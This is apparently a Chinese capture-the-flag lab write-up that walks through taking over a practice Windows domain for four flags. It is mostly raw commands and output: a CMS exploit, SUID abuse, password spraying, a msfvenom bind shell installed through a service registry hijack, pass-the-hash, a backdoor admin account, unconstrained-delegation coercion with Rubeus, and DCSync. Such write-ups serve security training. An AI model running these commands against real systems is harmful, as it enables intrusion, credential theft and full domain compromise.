目录
flag1
./fscan -h 39.101.135.65 -p 1-65535
访问web,cmseasy
访问./admin后弱口令admin/123456登录后台
打现成的EXP:CmsEasy_7.7.5_20211012存在任意文件写入和任意文件读取漏洞 | jdr
扫描二维码关注公众号,回复:
17425727 查看本文章
连蚁剑
suid提权读flag1
find / -perm -u=s -type f 2>/dev/null
diff --line-format=%L /dev/null /home/flag/flag01.txt
给到hint,明显是一个域用户
WIN19\Adrian
flag2
蚁剑上传fscan和frp,扫内网,搭隧道
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.4.7 is alive
(icmp) Target 172.22.4.36 is alive
(icmp) Target 172.22.4.19 is alive
(icmp) Target 172.22.4.45 is alive
[*] Icmp alive hosts len is: 4
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.36:21 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:445 open
172.22.4.36:3306 open
172.22.4.7:88 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] NetInfo
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] NetInfo
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] NetBios 172.22.4.45 XIAORANG\WIN19
[*] OsInfo 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.7 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] WebTitle http://172.22.4.45 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.4.36 code:200 len:68100 title:中文网页标题结合提示WIN19\Adrian,去打172.22.4.45 ,密码喷洒得到babygirl1这个过期的密码
proxychains4 crackmapexec smb 172.22.4.45 -u Adrian -p rockyou.txt -d WIN19
可以rdp连上去改密码
proxychains4 rdesktop 172.22.4.45 -r disk:share=/home/kali/Desktop/tmp先输一遍原账密,再修改登录
直接读flag2没有权限
找到一个风险文件,大意是可以对 gupdate 服务的注册表项进行广泛的修改,包括更改配置、删除和创建新的配置项等。
msfvenom -p windows/meterpreter/bind_tcp LPORT=1337 -f exe > exp.exe用kali分享来上传文件
修改注册表路径并启动进程
reg add HKLM\SYSTEM\CurrentControlSet\Services\gupdate /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Adrian\Desktop\exp.exe"
sc start gupdateuse exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 172.22.4.45
set LPORT 1337
exploit
ps选一个SYSTEM权限做migrate进程迁移
cat /users/administrator/flag/flag02.txt
flag3
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
打administrato的pth
proxychains4 python psexec.py [email protected] -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk
创建一个administrator权限用户
net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add再rdp连上去(方便管理员身份运行传上去的工具)
proxychains4 rdesktop 172.22.4.45 -u Z3r4y -d WIN19 -p '0x401@admin' -r disk:share=/home/kali/Desktop/tmpmsf抓一下哈希
load kiwi
creds_all
查看域内委派关系
proxychains4 python findDelegation.py xiaorang.lab/'WIN19$' -hashes :5943c35371c96f19bda7b8e67d041727 -dc-ip 172.22.4.7
存在一个非约束委派
先让WIN19监听
C:\Users\Z3r4y\Desktop\Rubeus4.0.exe monitor /interval:1 /filteruser:DC01$ > C:\Users\Z3r4y\Desktop\hash.txt
再利用强认证漏洞强制DC访问WIN19,拿到其TGT票据
proxychains4 python dfscoerce.py -u "WIN19$" -hashes :dd5b235421f0f6dbdb25a4c6340c5d12 -d xiaorang.lab WIN19 172.22.4.7
然后导入票据
C:\Users\Z3r4y\Desktop\Rubeus4.0.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6g3j9BWWyCBtzW9N+e2YA4NHLkKKmEtGl2Rw2gvVY41joyg1+9uFfFS2WSwfaElvuPlj4Om2FIDeKt6iylall0pDNtFOiQWeITkNwV3HUJsp+aibhLEg7vSIOdCdwCzPiOR2Da56gTGl59lRUG3gSF2/39AkgjiASVb6m3nyxb1/UixFH6IKzAbVT90Y6AZxHi+I6Z9hwhOAVodcxSSzQxvl1FroQCV66qgC8BqejYtL+KHZ/EAtfZ7gii8K0cqGy70I+Fsffn+WZaE2WtJC2MweQPtixsU3pD9KraBDRQoCmiGmFTMdftaqglApUHyoAx0M30wlIboTPR5V8KKMBwfcm/Id/9WQoe7hI6NtrAk/NpYZHHvMH86a5ckQLHhiyZleEaR4gi6ylBCwF/1tUb88yfXaPHKdN6Ww2+GrcG3medDVUtF8PFOxlMWdxThjcFEnt0Q3LPb2ah4YAM8CbspgTPPRQ/PCVQTy0lllmHT2gJjUzvZFl5mYuaXxQywgv0UEwXyvbBXTy2otaGsNHozVyHY5FLA27q/wJORokp6l4A7o2d4Ndzibdr74kFFDu6E1z06UpDExyX/KEGvVOtp918Yy0Masw3zC40o7hSZDKVNmXx1UmGm6ofytW5yPZNGGfXiEIqqk9JgS1EE1Y4VmCL0VXibIcVCN8Kb4X2qDwiDlSxTV+s+w0S+IYTcphvohdrleWfNEUXViJoegBPsGjTVwbEQGNn2rVOsvOF+DSjS8Lzp+lbcDboXwjTsFGM0eOemgXap1z+M4K8XAqp40Vg8UojV/YTfODC3sxJjlQ4fX28kFewMZiIuxJauXhWYzIq7GxDGk2RXO4rw8Nqu7Z558rvvE1li8nNWJ8onf96Fd/8rWgsNbwXf6IdURaw+k0HHOlNfWQVb8gcrQKhZtm3QnvQOIBUMRM6oHxA72EVl+gFKcKxYlQfhcZ2eKecbYFJWpbcWvlGFGXLe/Ajk345TUQZA39st/wXa34e1tOWbztxZsDrHtKjgoyE9o85UI/MKRRqhBG5s/3EpzALy1+jvXesNHe6zELN8TL4bsX/IASWm2BAj3z6cKRFOBqtJCH+q9ROWAa8rH7tgl/gWt1TT/F2YIHujBK6w7sCC4Rm/410xRBxtpllfO9mNZfBscxs2li9EBu4uM56Ql6ecOpijvD4AsBZ7uTlq+PJfLlAZ7EOq10pX7Kfl5bhSnAruBise1oQRSwydivheyGs/nqo3C0PebXY4oRw+qiffZV7eGylBGYDuiN41VUJLiznGAkAgBwm5znKlnffW1Nk0DyQ81airBLVX9GfH68mHjEReOyYe82t8MRBX3fpR/WNNfBW88HOZWySRsZtmR3+20lgrFE/ZXux8S4USr9zjoSAQDRsSj4fepKFriuTLVEANMuRPpeQ2eRgtgOnWGEjMhrPJ+F8l7jocwEWFImjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCDrKLK96jdRiyRvxBM1L+fJbrGc15bGbmZnwVT9jkJeHqEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI0MDkwMjEzMzYyNlqmERgPMjAyNDA5MDIyMzM2MjZapxEYDzIwMjQwOTA5MTMzNjI2WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==
猕猴桃抓一下哈希
lsadump::dcsync /domain:xiaorang.lab /all /csv
pth
proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/[email protected] -codec gbk读flag3
type c:\users\Administrator\flag\flag04.txt
flag4
proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/[email protected] -codec gbktype c:\users\Administrator\flag\flag04.txt